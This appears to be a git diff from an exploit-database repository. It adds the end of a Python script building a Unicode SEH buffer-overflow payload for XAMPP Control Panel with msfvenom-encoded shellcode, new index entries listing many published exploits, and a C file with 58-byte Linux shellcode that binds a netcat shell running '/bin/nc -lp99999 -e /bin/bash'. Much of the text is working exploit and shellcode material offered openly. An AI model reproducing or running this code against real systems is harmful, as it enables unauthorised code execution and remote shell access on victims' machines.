"exploit.txt" into the following field: "Editor". +# Click "Save" and then in the main window Click "Config" > "Apache (httpd.conf)". +# You will see that arbitrary code is executed. It should pop a messagebox. + +#cat 28996.bin | msfvenom -p - -a x86 --platform win -f py -e x86/unicode_mixed BufferRegister=EAX +#Length is 352, but double it. + +buf = "" +buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += "\x47\x42\x39\x75\x34\x4a\x42\x50\x31\x4a\x32\x68\x32" +buf += "\x50\x30\x61\x54\x34\x4b\x4a\x72\x74\x4b\x72\x32\x6a" +buf += "\x6c\x44\x4b\x4e\x72\x4d\x4c\x62\x6b\x4d\x72\x79\x78" +buf += "\x62\x6b\x31\x62\x4d\x50\x34\x4b\x4b\x62\x31\x70\x51" +buf += "\x6e\x6a\x6c\x50\x33\x62\x55\x68\x72\x75\x39\x69\x37" +buf += "\x4a\x63\x51\x68\x6f\x4c\x52\x6b\x4f\x67\x44\x38\x4a" +buf += "\x61\x45\x72\x52\x6b\x33\x4a\x4f\x30\x7a\x61\x77\x57" +buf += "\x4e\x51\x38\x6d\x64\x4b\x4d\x64\x74\x6f\x4a\x61\x36" +buf += "\x66\x70\x45\x42\x61\x6d\x6e\x4e\x66\x43\x31\x64\x34" +buf += "\x50\x61\x72\x55\x58\x72\x32\x61\x53\x4e\x49\x78\x6f" +buf += "\x55\x51\x68\x32\x49\x53\x44\x32\x55\x57\x79\x52\x6b" +buf += "\x53\x4a\x6f\x34\x4a\x61\x55\x77\x6f\x76\x62\x6b\x6e" +buf += "\x4c\x50\x6f\x54\x4b\x51\x6a\x6d\x4c\x6d\x31\x36\x67" +buf += "\x42\x6b\x63\x4c\x36\x4f\x79\x6c\x39\x71\x37\x57\x72" +buf += "\x48\x4d\x75\x4f\x54\x4f\x31\x6b\x51\x33\x38\x30\x4c" +buf += "\x6e\x6f\x71\x39\x4e\x74\x50\x68\x6b\x70\x51\x35\x6f" +buf += "\x68\x42\x30\x71\x79\x69\x51\x59\x6e\x70\x49\x5a\x6b" +buf += "\x4c\x71\x47\x50\x4e\x71\x62\x30\x69\x6f\x59\x47\x41" +buf += "\x41" + +# venetian padding + +ven = "\x53" #push esi +ven += "\x43" #align +ven += "\x58" #pop eax +ven += "\x43" #align +ven += "\x05\x50\x11" #add eax,11005000 +ven += "\x43" #align +ven += "\x2d\x1c\x11" #sub eax,33001700 +ven += "\x43" #align +ven += "\x48" #dec eax +ven += "\x43" #align +ven += "\x43"*2 #nops + +payload = "\x43"*270 + "\x37\x53" + ven + buf + "\x43" * (6000 - 2 - 270 - len(ven+buf)) + +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6f780129f..e6ed45c86 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6185,6 +6185,9 @@ id,file,description,date,author,type,platform,port 45806,exploits/windows/dos/45806.py,"HeidiSQL 9.5.0.5196 - Denial of Service (PoC)",2018-11-12,"Victor Mondragón",dos,windows, 45814,exploits/windows_x86-64/dos/45814.py,"CuteFTP 9.3.0.3 - Denial of Service (PoC)",2018-11-12,"Ismael Nava",dos,windows_x86-64, 45819,exploits/windows_x86-64/dos/45819.py,"Mongoose Web Server 6.9 - Denial of Service (PoC)",2018-11-12,"Ihsan Sencan",dos,windows_x86-64, +45823,exploits/macos/dos/45823.py,"CuteFTP Mac 3.1 - Denial of Service (PoC)",2018-11-13,"Yair Rodríguez Aparicio",dos,macos, +45824,exploits/linux/dos/45824.txt,"Evince 3.24.0 - Command Injection",2018-11-13,Matlink,dos,linux, +45829,exploits/windows/dos/45829.c,"Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service",2018-11-13,hyp3rlinx,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10094,6 +10097,8 @@ id,file,description,date,author,type,platform,port 45798,exploits/linux/local/45798.txt,"libiec61850 1.3 - Stack Based Buffer Overflow",2018-11-06,"Dhiraj Mishra",local,linux, 45804,exploits/linux/local/45804.txt,"OpenSLP 2.0.0 - Multiple Vulnerabilities",2018-11-07,"Magnus Klaaborg Stubman",local,linux, 45805,exploits/windows/local/45805.cpp,"Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass)",2018-11-08,"Tenable NS",local,windows, +45828,exploits/windows/local/45828.py,"XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)",2018-11-13,"Semen Alexandrovich Lyhin",local,windows, +45832,exploits/linux/local/45832.py,"xorg-x11-server < 1.20.1 - Local Privilege Escalation",2018-11-13,bolonobolo,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40317,15 +40322,33 @@ id,file,description,date,author,type,platform,port 45801,exploits/php/webapps/45801.txt,"OpenBiz Cubi Lite 3.0.8 - 'username' SQL Injection",2018-11-06,AkkuS,webapps,php,80 45802,exploits/php/webapps/45802.txt,"LibreHealth 2.0.0 - Arbitrary File Actions",2018-11-06,"Carlos Avila",webapps,php,80 45803,exploits/php/webapps/45803.txt,"PlayJoom 0.10.1 - 'catid' SQL Injection",2018-11-07,"Ihsan Sencan",webapps,php,80 -45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45808,exploits/linux/webapps/45808.txt,"TufinOS 2.17 Build 1193 - XML External Entity Injection",2018-11-12,"Konstantinos Alexiou",webapps,linux, -45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal",2018-11-12,"Pasquale Turi",webapps,php, -45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45809,exploits/php/webapps/45809.txt,"Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting",2018-11-12,"Pasquale Turi",webapps,php,80 +45810,exploits/php/webapps/45810.txt,"Paroiciel 11.20 - 'tRecIdListe' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45811,exploits/hardware/webapps/45811.rb,"TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)",2018-11-12,Wadeek,webapps,hardware, -45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, -45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45812,exploits/php/webapps/45812.txt,"The Don 1.0.1 - 'login' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 +45813,exploits/php/webapps/45813.txt,"Facturation System 1.0 - 'modid' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45815,exploits/php/webapps/45815.txt,"Easyndexer 1.0 - Cross-Site Request Forgery (Add Admin)",2018-11-12,"Ihsan Sencan",webapps,php, -45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, -45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45816,exploits/php/webapps/45816.txt,"GPS Tracking System 2.12 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 +45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 45818,exploits/hardware/webapps/45818.txt,"D-LINK Central WifiManager CWM-100 - Server-Side Request Forgery",2018-11-12,hyp3rlinx,webapps,hardware, -45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php, +45820,exploits/php/webapps/45820.txt,"Nominas 0.27 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80 +45822,exploits/php/webapps/45822.txt,"CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting",2018-11-13,InfinitumIT,webapps,php, +45825,exploits/php/webapps/45825.txt,"Surreal ToDo 0.6.1.2 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45826,exploits/php/webapps/45826.txt,"Surreal ToDo 0.6.1.2 - Local File Inclusion",2018-11-13,"Ihsan Sencan",webapps,php,80 +45827,exploits/php/webapps/45827.txt,"Alienor Web Libre 2.0 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45830,exploits/php/webapps/45830.txt,"Musicco 2.0.0 - Arbitrary Directory Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php, +45833,exploits/php/webapps/45833.txt,"Tina4 Stack 1.0.3 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45834,exploits/php/webapps/45834.txt,"Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45835,exploits/php/webapps/45835.txt,"Easyndexer 1.0 - Arbitrary File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45836,exploits/php/webapps/45836.txt,"ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45837,exploits/php/webapps/45837.txt,"Gumbo CMS 0.99 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45838,exploits/php/webapps/45838.txt,"Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45839,exploits/php/webapps/45839.txt,"ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)",2018-11-13,"Ameer Pornillos",webapps,php,80 +45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80 +45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80 +45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80 +45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 +45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80 diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 872f19abb..f4ad05de5 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -922,3 +922,4 @@ id,file,description,date,author,type,platform 45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 +45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/45821.c b/shellcodes/linux_x86/45821.c new file mode 100644 index 000000000..e3292e422 --- /dev/null +++ b/shellcodes/linux_x86/45821.c @@ -0,0 +1,55 @@ +/* +# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes) +# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work. +# Date: 04/11/2018 +# Exploit Author: Javier Tello +# Version: 1.0 +# Tested on: i686 GNU/Linux +# Shellcode Length: 58 Bytes + + +Disassembly of section .text: + +08048060 <_start>: + 8048060: 31 c0 xor %eax,%eax + 8048062: 50 push %eax + 8048063: 68 6e 2f 6e 63 push $0x636e2f6e + 8048068: 68 2f 2f 62 69 push $0x69622f2f + 804806d: 89 e3 mov %esp,%ebx + 804806f: 50 push %eax + 8048070: 68 62 61 73 68 push $0x68736162 + 8048075: 68 62 69 6e 2f push $0x2f6e6962 + 804807a: 68 2d 65 2f 2f push $0x2f2f652d + 804807f: 89 e2 mov %esp,%edx + 8048081: 50 push %eax + 8048082: 68 39 39 39 39 push $0x39393939 + 8048087: 68 2d 6c 70 39 push $0x39706c2d + 804808c: 89 e6 mov %esp,%esi + 804808e: 50 push %eax + 804808f: 52 push %edx + 8048090: 56 push %esi + 8048091: 53 push %ebx + 8048092: 89 e1 mov %esp,%ecx + 8048094: 89 c2 mov %eax,%edx + 8048096: b0 0b mov $0xb,%al + 8048098: cd 80 int $0x80 + +===============poc by Javier Tello========================= +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"; + +main() { + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} \ No newline at end of file